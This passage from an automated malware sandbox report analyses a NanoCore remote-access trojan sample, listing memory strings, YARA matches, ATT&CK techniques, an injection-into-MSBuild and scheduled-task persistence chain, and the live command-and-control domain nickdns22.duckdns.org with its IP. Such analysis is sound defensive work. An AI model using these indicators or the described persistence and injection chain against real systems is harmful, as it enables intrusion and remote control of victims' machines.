        Source: qnJXJsqt1M.exeBinary or memory string: WIN_XP
        Source: qnJXJsqt1M.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.263480131.0000000001004000.00000004.00000001.sdmpBinary or memory string: t0lj1bz7kyfvrnjhanglri8hhtcuWIN_7rs4zlupb30fv5a
        Source: qnJXJsqt1M.exeBinary or memory string: WIN_XPe
        Source: qnJXJsqt1M.exeBinary or memory string: WIN_VISTA
        Source: qnJXJsqt1M.exeBinary or memory string: WIN_7
        Source: qnJXJsqt1M.exeBinary or memory string: WIN_8
        Source: qnJXJsqt1M.exe, 00000000.00000002.241202485.0000000001603000.00000004.00000001.sdmpBinary or memory string: t0lj1bz7kyfvrnjhanglri8hhtcuWIN_7rs4zlupb30fv5ap

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: qnJXJsqt1M.exe, 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: znytpstdcrwsisx.exe, 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000000.00000003.234051628.00000000016D3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271278827.0000000004519000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271444050.00000000044E6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.287551362.0000000004581000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.269052958.000000000454C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237700588.00000000017A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232372398.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.506144635.0000000004237000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.286334104.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271541337.00000000044B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.507400342.0000000005E00000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268804355.00000000044B3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232471395.000000000173A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237121174.00000000017D3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271021731.0000000001204000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.236754982.0000000004671000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.237756346.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268781078.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.287492907.0000000003581000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.272077281.000000000118B000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.239247131.000000000176C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.236584811.00000000016C4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268745620.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.274048307.00000000011D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.269076218.000000000126A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.268921996.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.234856164.0000000001739000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.272132273.00000000011A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.271693708.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.232598333.000000000149D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.235161139.00000000016F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.233676128.000000000176D000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.498286656.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5796, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: qnJXJsqt1M.exe PID: 2764, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: znytpstdcrwsisx.exe PID: 3192, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4156, type: MEMORY
        Source: Yara matchFile source: 11.3.znytpstdcrwsisx.exe.11d0fe8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.3.znytpstdcrwsisx.exe.11d0fe8.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17297f8.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45ceac4.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45d30ed.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.4239c8e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e00000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45ceac4.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.42430ed.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.423eac4.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.176cb50.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.45c9c8e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.423eac4.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e04629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.MSBuild.exe.5e00000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.1739f48.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.16ec7e0.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17293d8.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.3.qnJXJsqt1M.exe.17293d8.0.unpack, type: UNPACKEDPE
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B28C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,
        Source: C:\Users\user\Desktop\qnJXJsqt1M.exeCode function: 0_2_00B2923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_0542275A bind,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 1_2_05422708 bind,

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2Native API1Startup Items1Startup Items1Disable or Modify Tools11Input Capture31System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsScheduled Task/Job1Application Shimming1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture31Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Valid Accounts2Application Shimming1Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Scheduled Task/Job1Valid Accounts2Software Packing11NTDSSystem Information Discovery26Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronRegistry Run Keys / Startup Folder2Access Token Manipulation21Masquerading1LSA SecretsSecurity Software Discovery231SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol22Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonProcess Injection312Valid Accounts2Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsScheduled Task/Job1Virtualization/Sandbox Evasion21DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobRegistry Run Keys / Startup Folder2Access Token Manipulation21Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383820 Sample: qnJXJsqt1M.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 44 nickdns22.duckdns.org 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 13 other signatures 2->52 9 qnJXJsqt1M.exe 5 2->9         started        13 znytpstdcrwsisx.exe 2->13         started        15 MSBuild.exe 4 2->15         started        signatures3 process4 file5 34 C:\Users\user\AppData\...\znytpstdcrwsisx.exe, PE32 9->34 dropped 56 Binary is likely a compiled AutoIt script file 9->56 58 Writes to foreign memory regions 9->58 60 Allocates memory in foreign processes 9->60 17 MSBuild.exe 10 9->17         started        36 C:\Users\user\...\znytpstdcrwsisx.fr.url, MS 13->36 dropped 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Injects a PE file into a foreign processes 13->66 22 MSBuild.exe 2 13->22         started        24 conhost.exe 15->24         started        signatures6 process7 dnsIp8 38 nickdns22.duckdns.org 192.169.69.26, 1896, 49695, 49698 WOWUS United States 17->38 40 127.0.0.1 unknown unknown 17->40 42 192.168.2.1 unknown unknown 17->42 30 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 17->30 dropped 32 C:\Users\user\AppData\Local\...\tmpC4DF.tmp, XML 17->32 dropped 54 Uses schtasks.exe or at.exe to add and modify task schedules 17->54 26 schtasks.exe 1 17->26         started        file9 signatures10 process11 process12 28 conhost.exe 26->28         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        qnJXJsqt1M.exe68%VirustotalBrowse
        qnJXJsqt1M.exe41%MetadefenderBrowse
        qnJXJsqt1M.exe79%ReversingLabsWin32.Backdoor.NanoCore
        qnJXJsqt1M.exe100%AviraDR/AutoIt.Gen8

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe100%AviraDR/AutoIt.Gen8
        C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe55%VirustotalBrowse
        C:\Users\user\AppData\Roaming\hdoydskbdx\znytpstdcrwsisx.exe48%ReversingLabsWin32.Trojan.Wacatac

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        1.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        11.2.znytpstdcrwsisx.exe.d50000.0.unpack100%AviraDR/AutoIt.Gen8Download File
        12.2.MSBuild.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        11.0.znytpstdcrwsisx.exe.d50000.0.unpack100%AviraDR/AutoIt.Gen8Download File
        0.2.qnJXJsqt1M.exe.ad0000.0.unpack100%AviraDR/AutoIt.Gen8Download File
        0.0.qnJXJsqt1M.exe.ad0000.0.unpack100%AviraDR/AutoIt.Gen8Download File
        1.2.MSBuild.exe.5e00000.9.unpack100%AviraTR/NanoCore.fadteDownload File

        Domains

        SourceDetectionScannerLabelLink
        nickdns22.duckdns.org7%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        nickdns22.duckdns.org7%VirustotalBrowse
        nickdns22.duckdns.org0%Avira URL Cloudsafe
        127.0.0.10%VirustotalBrowse
        127.0.0.10%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        nickdns22.duckdns.org
        		192.169.69.26
        		truetrueunknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        nickdns22.duckdns.orgtrue
        • 7%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        127.0.0.1true
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public

        IPDomainCountryFlagASNASN NameMalicious
        192.169.69.26
        		nickdns22.duckdns.orgUnited States
        		23033WOWUStrue

        Private

        IP
        192.168.2.1
        127.0.0.1

        General Information

        Joe Sandbox Version:31.0.0 Emerald
        Analysis ID:383820
        Start date:08.04.2021
        Start time:10:31:20
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 9m 49s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:qnJXJsqt1M.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:35
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@11/10@13/3
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 5.9% (good quality ratio 5.9%)
        • Quality average: 82.1%
        • Quality standard deviation: 20.4%
        HCA Information:
        • Successful, ratio: 69%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        Show All
        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • TCP Packets have been reduced to 100
        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 104.43.139.144, 23.54.113.53, 95.100.54.203, 13.88.21.125, 20.82.210.154, 23.10.249.43, 23.10.249.26, 23.0.174.185, 23.0.174.200, 52.155.217.156, 20.54.26.129
        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        10:32:15Task SchedulerRun new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" s>$(Arg0)
        10:32:15API Interceptor995x Sleep call for process: MSBuild.exe modified
        10:32:15AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\znytpstdcrwsisx.fr.url

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        192.169.69.26MglhrJiLUL.exeGet hashmaliciousBrowse
        • 195.245.112.115/index.php
        On35KJkYT4.exeGet hashmaliciousBrowse
        • 195.245.112.115/index.php
        Order_List.xlsxGet hashmaliciousBrowse
        • dubaisupport.duckdns.org/file.exe

        Domains

        No context

        ASN

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        WOWUS1RkccAiQMy.exeGet hashmaliciousBrowse
        • 192.169.69.25
        NaHU7wO2Wf.exeGet hashmaliciousBrowse
        • 192.169.69.25
        hQtNCi8128.exeGet hashmaliciousBrowse
        • 192.169.69.25
        FB11.exeGet hashmaliciousBrowse
        • 216.244.74.42
        CDFCB9455FC457AC23BE82004BDCF4120E3C8D6FD2918.exeGet hashmaliciousBrowse
        • 192.169.69.25
        EUjk8F87b8.exeGet hashmaliciousBrowse
        • 192.169.69.25
        MglhrJiLUL.exeGet hashmaliciousBrowse
        • 192.169.69.26
        On35KJkYT4.exeGet hashmaliciousBrowse
        • 192.169.69.26
        ORDER-0319.pdf.exeGet hashmaliciousBrowse
        • 192.169.69.25
        ORDER-21031566AF.exeGet hashmaliciousBrowse
        • 192.169.69.25
        ttmPnejtED.jsGet hashmaliciousBrowse
        • 192.169.69.25
        3Ad4ZKWT0L.exeGet hashmaliciousBrowse
        • 192.169.69.25
        EbJIveZLAv.exeGet hashmaliciousBrowse
        • 192.169.69.26
        Order_List.xlsxGet hashmaliciousBrowse
        • 192.169.69.26
        payload3.exeGet hashmaliciousBrowse
        • 192.169.69.25
        ORDER-02108 xls.exeGet hashmaliciousBrowse
        • 192.169.69.25
        ORDER #0206.exeGet hashmaliciousBrowse
        • 192.169.69.25
        mensaje 2201 012021 PPK_8747.docGet hashmaliciousBrowse
        • 207.244.148.124
        New Order.exeGet hashmaliciousBrowse
        • 172.93.222.169
        SOPORTEDE.exeGet hashmaliciousBrowse
        • 192.169.69.26

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\MSBuild.exe.log
        Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        File Type:ASCII text, with CRLF line terminators
        Category:modified
        Size (bytes):325
        Entropy (8bit):5.334380084018418
        Encrypted:false
        SSDEEP:6:Q3LadLCR22IAQykdL1tZbLsbFLIP12MUAvvro6ysGMFLIP12MUAvvrs:Q3LaJU20NaL1tZbgbe4MqJsGMe4M6
        MD5:65CE98936A67552310EFE2F0FF5BDF88
        SHA1:8133653A6B9A169C7496ADE315CED322CFC3613A
        SHA-256:682F7C55B1B6E189D17755F74959CD08762F91373203B3B982ACFFCADE2E871A
        SHA-512:2D00AC024267EC384720A400F6D0B4F7EDDF49FAF8AB3C9E6CBFBBAE90ECADACA9022B33E3E8EC92E4F57C7FC830299C8643235EB4AA7D8A6AFE9DD1775F57C3
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
        C:\Users\user\AppData\Local\Temp\autB7CF.tmp
        Process:C:\Users\user\Desktop\qnJXJsqt1M.exe
        File Type:data
        Category:dropped
        Size (bytes):207872
        Entropy (8bit):7.999050560075495
        Encrypted:true
        SSDEEP:6144:yfHioBK/DQ0vgnZ92J6yN8n59mrjuydK/znla5oC:yfOjvgb2JpNeorjOznA5oC
        MD5:D63A88D1A1B8198E665C1094E96488BC
        SHA1:427EA9EB92C1C20B647CECD78C6085B509BCC326
        SHA-256:68B951C18FA6D7FDD30A5EB01609BAB36677D1414A6EC2D5A25C327A7D7CB9B0
        SHA-512:9C79A3F8E506447F6B5D24E27CED80E4EE449245D3483741EBD27E89656423B0ABDE9AE8ADBEAB430566999E86E3E70A8FECB6FE7F515F327066FF42E7A9E236
        Malicious:false
        Reputation:low
